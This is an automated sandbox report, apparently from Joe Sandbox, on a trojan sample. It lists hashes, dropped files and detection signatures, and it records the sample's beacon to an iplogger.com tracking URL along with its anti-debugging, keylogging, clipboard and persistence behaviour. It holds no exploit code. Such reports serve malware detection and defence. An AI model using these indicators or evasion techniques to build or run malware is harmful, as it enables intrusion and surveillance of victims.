Windows Analysis Report
cW5i0RdQ4L.exe

Overview

General Information

Sample name: cW5i0RdQ4L.exe
renamed because original name is a hash value
Original sample name: c065ba22909fc8dbded4ea0eebb24ad5.exe
Analysis ID: 1532361
MD5: c065ba22909fc8dbded4ea0eebb24ad5
SHA1: b3d61dd7519be3d2909be9ce2d28f65ec7f9965d
SHA256: 9817f4d8bc1374f102196cfcb8a351abdc0563dea60f6084a7525e5ee5409b6d
Tags: 32 exe trojan

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Virustotal: Detection: 9%
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Virustotal: Detection: 9%
Source: cW5i0RdQ4L.exe Virustotal: Detection: 13%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 97.8% probability
Source: cW5i0RdQ4L.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: cW5i0RdQ4L.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00E64005
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00E6494A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00E63CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00E6C2FF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_00E6CD9F
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6CD14 FindFirstFileW,FindClose, 10_2_00E6CD14
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00E6F5D8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00E6F735
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00E6FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00944005
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose, 16_2_0094494A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 16_2_0094C2FF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 16_2_0094CD9F
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094CD14 FindFirstFileW,FindClose, 16_2_0094CD14
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_0094F5D8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_0094F735
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 16_2_0094FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00943CE2
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\103495\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\103495
Source: Joe Sandbox View IP Address: 104.21.76.57 104.21.76.57
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: iplogger.com
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 104.21.76.57:443
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 104.21.76.57:443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E729BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 10_2_00E729BA
Source: global traffic HTTP traffic detected:
GET /15RZZ4 HTTP/1.1
User-Agent: Cutting
Host: iplogger.com
Source: global traffic DNS traffic detected: DNS query: iplogger.com
Source: global traffic DNS traffic detected: DNS query: SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPy
Source: global traffic HTTP traffic detected:
HTTP/1.1 403 Forbidden
Date: Sun, 13 Oct 2024 00:07:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Sun, 13 Oct 2024 00:07:45 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBJvXw6fUbGRbS6RhK%2BGglPGzigQ8JyjV5ntZrCNYPilv4t%2Bg9XoXSqGoRUPjt%2FvFa12kdE6KCZ2qc23Cv6fj1N6EHxcxAdUxPNTrxcgctB2VZpV9yNWlFJp8g7wo2s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8d1b16fe1a345e6e-EWR
Source: global traffic HTTP traffic detected:
HTTP/1.1 403 Forbidden
Date: Sun, 13 Oct 2024 00:07:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Sun, 13 Oct 2024 00:08:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKUrKGuZsfbYGpfMv7w87P%2FU%2FWzTCe9VK5vZUxav4Fq8km2kSEIxcqEg6xpwukUByhH2upXUjS3mSd6vZP%2F3TdcVGBnYw0NEY9Hv2CUhgQDSfhXPCwQ39bhwGAJEb5I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8d1b176299e4c323-EWR
Source: cW5i0RdQ4L.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cW5i0RdQ4L.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: cW5i0RdQ4L.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: cW5i0RdQ4L.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmp, cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: cW5i0RdQ4L.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cW5i0RdQ4L.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: cW5i0RdQ4L.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: cW5i0RdQ4L.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: cW5i0RdQ4L.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: cW5i0RdQ4L.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: cW5i0RdQ4L.exe String found in binary or memory: http://ocsp.digicert.com0
Source: cW5i0RdQ4L.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: cW5i0RdQ4L.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: cW5i0RdQ4L.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmp, cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3570670968.00000000009A9000.00000002.00000001.01000000.0000000A.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: cW5i0RdQ4L.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: Powder.pif, 0000000A.00000002.3571443767.00000000019C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.com/
Source: Powder.pif, 0000000A.00000002.3571321856.0000000001959000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3571781276.000000000171A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.com/15RZZ4
Source: Powder.pif, 0000000A.00000002.3571443767.0000000001B30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.com/15RZZ40
Source: Powder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.com/15RZZ4O
Source: GuardianCryptoElite.scr, 00000010.00000002.3571413798.000000000153A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.com/15RZZ4eListcessId;
Source: GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.com/R
Source: GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.com/m
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Serious.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E74830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 10_2_00E74830
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00954830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 16_2_00954830
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E74632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 10_2_00E74632
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E8D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 10_2_00E8D164
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0096D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 16_2_0096D164

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E642D5: CreateFileW,DeviceIoControl,CloseHandle, 10_2_00E642D5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E58F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 10_2_00E58F2E
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E65778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 10_2_00E65778
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00945778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 16_2_00945778
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_0090BFD6 16_2_0090BFD6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00901FC0 16_2_00901FC0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: String function: 00908B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: String function: 008F1A36 appears 34 times
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: String function: 00900D17 appears 70 times
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: String function: 00E28B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: String function: 00E20D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: String function: 00E11A36 appears 34 times
Source: cW5i0RdQ4L.exe Static PE information: invalid certificate
Source: cW5i0RdQ4L.exe, 00000000.00000003.1718798181.0000000000644000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719275870.0000000000644000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: cW5i0RdQ4L.exe Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: classification engine Classification label: mal96.expl.evad.winEXE@28/18@3/1
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6A6AD GetLastError,FormatMessageW, 10_2_00E6A6AD
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E58DE9 AdjustTokenPrivileges,CloseHandle, 10_2_00E58DE9
